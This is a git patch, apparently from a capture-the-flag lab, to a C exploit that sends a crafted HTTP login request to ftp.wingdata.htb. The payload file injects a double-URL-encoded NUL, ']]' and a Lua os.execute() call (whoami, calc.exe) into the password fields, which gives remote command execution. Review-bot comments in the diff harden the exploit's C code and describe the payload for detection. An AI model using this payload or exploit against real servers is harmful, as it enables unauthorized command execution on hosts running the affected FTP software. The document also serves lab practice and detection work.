From 194309a3bfa14f3f8b4053c052307875b41d0392 Mon Sep 17 00:00:00 2001 From: hexplor Date: Sat, 25 Apr 2026 22:22:27 +0200 Subject: [PATCH] upate --- Makefile | 4 ++-- exploit.c | 30 +++++++++++++++++------------- payload.txt | 3 +-- 3 files changed, 20 insertions(+), 17 deletions(-) diff --git a/Makefile b/Makefile index 96c8587..ac95572 100644 --- a/Makefile +++ b/Makefile @@ -1,7 +1,7 @@ EXEC = exploit $(EXEC): exploit.o - gcc -o $(EXEC) exploit.o + gcc -g -o $(EXEC) exploit.o exploit.o: exploit.c - gcc -c exploit.c + gcc -g -c exploit.c diff --git a/exploit.c b/exploit.c index 4202577..fd96b78 100644 --- a/exploit.c +++ b/exploit.c @@ -21,29 +21,33 @@ int main(int argc, char** argv){ dest_addr.sin_port = htons(80); dest_addr.sin_addr.s_addr = inet_addr(argv[1]); - int ret = connect(fd,(struct sockaddr*)&dest_addr, sizeof(dest_addr)); printf("ret_connect = %d\n", ret); char buffer[100]; memset(buffer, 0, 100); + + FILE* fichier_out = fopen("payload.txt", "r"); + fseek(fichier_out, 0, SEEK_END); - strncpy(buffer, "GET /login.html HTTP/1.1\r\n", 100); - send(fd, buffer, strlen(buffer), 0); - - strncpy(buffer, "Host: ftp.wingdata.htb\r\n", 100); - send(fd, buffer, strlen(buffer), 0); - - strncpy(buffer, "Accept: */*\r\n", 100); - send(fd, buffer, strlen(buffer), 0); - - strncpy(buffer, "\r\n", 100); - send(fd, buffer, strlen(buffer), 0); - + + int size = fichier_out->_offset; + char* file_buffer = malloc(size); + fseek(fichier_out, 0, SEEK_SET); + fread(file_buffer, 1, size, fichier_out); + for (int i = 0; i < size; i++){ + char c = file_buffer[i]; + if (c == '\n') + send(fd, "\r\n", 2, 0); + else + send(fd, &c, 1, 0); + } + send(fd, "\r\n", 2, 0); int n; while (( n = recv(fd, buffer, 99, 0)) > 0){ buffer[n] = 0; printf("%s", buffer); } + fclose(fichier_out); return 0; } diff --git a/payload.txt b/payload.txt index 6467535..fd9e145 100644 --- a/payload.txt +++ b/payload.txt 
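Review bot: In the exploit.c hunk, `int size = fichier_out->_offset;` reads a private glibc `FILE` member. It is not a documented way to get the file position and does not exist in other C libraries, so the value passed to `malloc` and `fread` is not reliable; `ftell()` after the `fseek(..., SEEK_END)` is the supported call. The results of `fopen`, `malloc` and `fread` are also used unchecked: a missing payload.txt reaches `fseek` with a NULL stream, and the loop runs over `size` bytes even when `fread` returned fewer. `file_buffer` is never freed, and `ret` from `connect` is printed but the code carries on after a failed connect. `main` begins before the hunk, so whether `<stdlib.h>` is included for `malloc` cannot be seen from here.

```c
    FILE* fichier_out = fopen("payload.txt", "r");
    if (fichier_out == NULL) {
        perror("payload.txt");
        return 1;
    }
    if (fseek(fichier_out, 0, SEEK_END) != 0) {
        perror("fseek");
        fclose(fichier_out);
        return 1;
    }
    long size = ftell(fichier_out);   /* supported API instead of ->_offset */
    if (size <= 0 || fseek(fichier_out, 0, SEEK_SET) != 0) {
        fprintf(stderr, "payload.txt is empty or not seekable\n");
        fclose(fichier_out);
        return 1;
    }
    char* file_buffer = malloc((size_t)size);
    if (file_buffer == NULL) {
        perror("malloc");
        fclose(fichier_out);
        return 1;
    }
    /* Only the bytes fread actually delivered are valid. */
    size_t got = fread(file_buffer, 1, (size_t)size, fichier_out);
    for (size_t i = 0; i < got; i++){
        /* … unchanged: per-byte LF to CRLF send … */
    }
    /* … unchanged: trailing CRLF send and recv loop … */
    free(file_buffer);
    fclose(fichier_out);
```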
@@ -12,5 +12,4 @@ Referer: http://ftp.wingdata.htb/login.html Accept-Encoding: gzip, deflate, br Cookie: client_lang=french Connection: keep-alive - -username=anonymous&password=anonymous%2500%5D%5D+os.execute%28%27calc.exe%27%29+--&username_val=anonymous&password_val=anonymous%2500%5D%5D+os.execute%28%27calc.exe%27%29+-- +username=anonymous&password=anonymous%2500%5D%5D+os.execute%28%27whoami%27%29+--&username_val=anonymous&password_val=anonymous%2500%5D%5D+os.execute%28%27calc.exe%27%29+--
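Review bot: Nothing in the commit records what this request body is a sample of, so the file cannot be reused for detection or regression work without decoding it by hand. A short note beside it should say that `password` and `password_val` each carry a double-URL-encoded NUL (`%2500`) followed by `]]` and a Lua `os.execute(...)` call. The change edits only `password`, so after this commit the two fields name different commands (`whoami` and `calc.exe`). A detection built from this sample is therefore better keyed on the encoded NUL inside a credential field, and on the server process spawning any child process, than on one command name. On the server side, the sample suggests rejecting login parameters that contain a NUL byte, though the handling code is not visible here.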